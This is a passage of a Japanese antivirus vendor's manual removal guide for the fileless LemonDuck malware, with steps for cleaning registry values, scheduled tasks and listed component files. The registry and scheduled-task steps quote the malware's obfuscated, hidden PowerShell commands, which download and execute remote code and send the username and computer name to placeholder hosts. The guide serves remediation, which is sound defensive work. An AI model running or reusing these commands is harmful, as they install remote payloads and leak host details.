DelegateExecute = {Null}
再び、右側のパネルで以下のレジストリ値を検索します。
(default) = cmd /c powershell -w hidden Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')
レジストリエディタを閉じます。

手順 5

スケジュールされたタスクを削除する

タスク削除の手順に含まれる{タスク名} - {実行するタスク}には以下が当てはまります。

Rtsa - \"{Download URL 1}\",\"{Download URL 2}\",\"{Download URL 2}\"|foreach{I`EX(Ne`w-Obj`ect Net.WebC`lient).\"DownloadString\"(\"http://$_/ebo.jsp?0.9*$env:username*$env:computername\")}"
blackball - blackball
{random} - powershell -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('{Base64 encoded command}');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='{Download URL}';a($url+'/a.jsp?mail_20210428?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))

Windows 2000、Windows XP、Windows Server 2003の場合：

[スタート]→[プログラム]→[アクセサリ]→[システムツール]→[スケジュールされたタスク]をクリックして、スケジュールされたタスクを開きます。
上記の{タスク名} を、[名前]の欄に入力します。
入力した{タスク名} 持つファイルを右クリックします。
[プロパティ]をクリックします。 [実行]フィールドで、表示されている{実行するタスク}を確認します。
上記の{実行するタスク}と文字列が一致するタスクを削除します。

Windows Vista、Windows 7、Windows Server 2008、Windows 8、Windows 8.1、およびWindows Server 2012の場合：

Windowsタスクスケジューラを開きます。
• Windows Vista、Windows 7、Windows Server 2008の場合、[スタート]をクリックし、[検索]フィールドに「taskchd.msc」と入力してEnterキーを押します。
• Windows 8、Windows 8.1、Windows Server 2012の場合、画面の左下隅を右クリックし、[実行]をクリックし、「taskchd.msc」と入力してEnterキーを押します。
左側のパネルで、[タスクスケジューラライブラリ]をクリックします。
中央上部のパネルで、上記の{タスク名}を[名前]の欄に入力します。
中央下部のパネルで、[アクション]タブをクリックします。 [詳細]の欄で、{実行するタスク}を確認します。
文字列が一致するタスクを削除します。

手順 6

以下のファイルを検索し削除します。

[ 詳細 ]

コンポーネントファイルが隠しファイル属性の場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。

{Removable/Network Drive name}\Dblue3.lnk
{Removable/Network Drive name}\Eblue3.lnk
{Removable/Network Drive name}\Fblue3.lnk
{Removable/Network Drive name}\Gblue3.lnk
{Removable/Network Drive name}\Hblue3.lnk
{Removable/Network Drive name}\Iblue3.lnk
{Removable/Network Drive name}\Jblue3.lnk
{Removable/Network Drive name}\Kblue3.lnk
{Removable/Network Drive name}\Dblue6.lnk
{Removable/Network Drive name}\Eblue6.lnk
{Removable/Network Drive name}\Fblue6.lnk
{Removable/Network Drive name}\Gblue6.lnk
{Removable/Network Drive name}\Hblue6.lnk
{Removable/Network Drive name}\Iblue6.lnk
{Removable/Network Drive name}\Jblue6.lnk
{Removable/Network Drive name}\Kblue6.lnk
{Removable/Network Drive name}\readme.js
{Removable/Network Drive name}\UTFsync\inf_data
%System%\inetpub\wwwroot\aspnet_client\js\demo\wanlin.txt
%System%\inetpub\wwwroot\aspnet_client\js\demo\wanlins.aspx
%User Temp%\tt.vbs
%User Temp%\m6.bin
%User Temp%\m6g.bin
%User Temp%\kr.bin
%User Temp%\if.bin
%User Temp%\if_mail.bin
%User Temp%\ode.bin
%User Temp%\nvd.zip
%User Temp%\mimi.dat
%User Temp%\mso.jsp
%User Temp%\ms.jsp
%User Temp%\rdp.jsp
%User Temp%\rdpo.jsp
%User Temp%\smgh.jsp
%User Temp%\smgho.jsp
%User Temp%\logic.jsp
%User Temp%\logico.jsp
{Malware Path}\dn.ps1
{Malware Path}\m6.exe
{Malware Path}\svchost.dat

マルウェアのコンポーネントファイルの削除：

Windows 2000、XP および Server 2003 の場合：

[スタート]-[検索]-[ファイルとフォルダすべて]を選択します。
[ファイル名のすべてまたは一部]に以下のファイル名を入力してください。

{Removable/Network Drive name}\Dblue3.lnk
{Removable/Network Drive name}\Eblue3.lnk
{Removable/Network Drive name}\Fblue3.lnk
{Removable/Network Drive name}\Gblue3.lnk
{Removable/Network Drive name}\Hblue3.lnk
{Removable/Network Drive name}\Iblue3.lnk
{Removable/Network Drive name}\Jblue3.lnk
{Removable/Network Drive name}\Kblue3.lnk
{Removable/Network Drive name}\Dblue6.lnk
{Removable/Network Drive name}\Eblue6.lnk
{Removable/Network Drive name}\Fblue6.lnk
{Removable/Network Drive name}\Gblue6.lnk
{Removable/Network Drive name}\Hblue6.lnk
{Removable/Network Drive name}\Iblue6.lnk
{Removable/Network Drive name}\Jblue6.lnk
{Removable/Network Drive name}\Kblue6.lnk
{Removable/Network Drive name}\readme.js
{Removable/Network Drive name}\UTFsync\inf_data
%System%\inetpub\wwwroot\aspnet_client\js\demo\wanlin.txt
%System%\inetpub\wwwroot\aspnet_client\js\demo\wanlins.aspx
%User Temp%\tt.vbs
%User Temp%\m6.bin
%User Temp%\m6g.bin
%User Temp%\kr.bin
%User Temp%\if.bin
%User Temp%\if_mail.bin
%User Temp%\ode.bin
%User Temp%\nvd.zip
%User Temp%\mimi.dat
%User Temp%\mso.jsp
%User Temp%\ms.jsp
%User Temp%\rdp.jsp
%User Temp%\rdpo.jsp
%User Temp%\smgh.jsp
%User Temp%\smgho.jsp
%User Temp%\logic.jsp
%User Temp%\logico.jsp
{Malware Path}\dn.ps1
{Malware Path}\m6.exe
{Malware Path}\svchost.dat
[探す場所]の一覧から[マイコンピュータ]を選択し、[検索]を押します。
検索が終了したら、ファイルを選択し、SHIFT+DELETE を押します。これにより、ファイルが完全に削除されます。
残りのファイルに対して、マルウェアのコンポーネントファイルの削除の手順 2.）から4 .）を繰り返してください。

Windows Vista、7、Server 2008、8、8.1 および Server 2012 の場合：

Windowsエクスプローラ画面を開きます。
- Windows Vista、7 および Server 2008 の場合：
  - [スタート]-[コンピューター]を選択します。
- Windows 8、8.1 および Server 2012 の場合：
  - 画面の左下隅を右クリックし、[エクスプローラー]を選択します。
[コンピューターの検索]に、以下を入力します。

{Removable/Network Drive name}\Dblue3.lnk
{Removable/Network Drive name}\Eblue3.lnk
{Removable/Network Drive name}\Fblue3.lnk
{Removable/Network Drive name}\Gblue3.lnk
{Removable/Network Drive name}\Hblue3.lnk
{Removable/Network Drive name}\Iblue3.lnk
{Removable/Network Drive name}\Jblue3.lnk
{Removable/Network Drive name}\Kblue3.lnk
{Removable/Network Drive name}\Dblue6.lnk
{Removable/Network Drive name}\Eblue6.lnk
{Removable/Network Drive name}\Fblue6.lnk
{Removable/Network Drive name}\Gblue6.lnk
{Removable/Network Drive name}\Hblue6.lnk
{Removable/Network Drive name}\Iblue6.lnk
{Removable/Network Drive name}\Jblue6.lnk
{Removable/Network Drive name}\Kblue6.lnk
{Removable/Network Drive name}\readme.js
{Removable/Network Drive name}\UTFsync\inf_data
%System%\inetpub\wwwroot\aspnet_client\js\demo\wanlin.txt
%System%\inetpub\wwwroot\aspnet_client\js\demo\wanlins.aspx
%User Temp%\tt.vbs
%User Temp%\m6.bin
%User Temp%\m6g.bin
%User Temp%\kr.bin
%User Temp%\if.bin
%User Temp%\if_mail.bin
%User Temp%\ode.bin
%User Temp%\nvd.zip
%User Temp%\mimi.dat
%User Temp%\mso.jsp
%User Temp%\ms.jsp
%User Temp%\rdp.jsp
%User Temp%\rdpo.jsp
%User Temp%\smgh.jsp
%User Temp%\smgho.jsp
%User Temp%\logic.jsp
%User Temp%\logico.jsp
{Malware Path}\dn.ps1
{Malware Path}\m6.exe
{Malware Path}\svchost.dat
ファイルが表示されたら、そのファイルを選択し、SHIFT+DELETE を押します。これにより、ファイルが完全に削除されます。
残りのファイルに対して、マルウェアのコンポーネントファイルの削除の手順 2.）から4 .）を繰り返してください。
註：Windows 7 において上記の手順が正しく行われない場合、マイクロソフトのWebサイトをご確認ください。

手順 7

コンピュータを通常モードで再起動し、最新のバージョン（エンジン、パターンファイル）を導入したウイルス対策製品を用い、「Fileless.LEMONDUCK」と検出したファイルの検索を実行してください。検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。

ご利用はいかがでしたか？　アンケートにご協力ください